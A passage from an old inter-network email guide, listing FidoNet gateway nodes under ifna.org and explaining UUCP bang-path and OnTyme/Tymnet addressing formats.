104 56 milehi.ifna.org
105 55 casper.ifna.org
107 320
rubbs.ifna.org
109 661 blkcat.ifna.org
125 406 fidogate.ifna.org
128
19 hipshk.ifna.org
129 65 insight.ifna.org
143 N/A fidogate.ifna.org
152 200 castle.ifna.org
161 N/A fidogate.ifna.org
369 17
megasys.ifna.org
NOTE: The UUCP equivalent node name is the first part
of the node name. In other words, the UUCP node
milehi is listed as
milehi.ifna.org but can be mailed directly over the UUCP network.
Another way to mail to FIDONET, specifically for Internet people, is in
this format:
ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu
And for those UUCP mailing people out
there, just use the path described and ignore the
@husc5.harvard.edu
portion. There is a FIDONET NODELIST available on most any FIDONET bulletin
board,
but it is quite large.
ONTYME
Previously known as
Tymnet, OnTyme is the McDonnell Douglas revision. After they bought out Tymnet,
they renamed the company and opened an experimental Internet gateway at
ONTYME.TYMNET.COM but this is
supposedly only good for certain corporate
addresses within McDonnell Douglas and Tymnet, not their
customers. The
userid format is xx.yyy or xx.y/yy where xx is a net name and yyy (or y/yy) is a
true
username. If you cannot directly nail this, try:
xx.yyy%ONTYME.TYM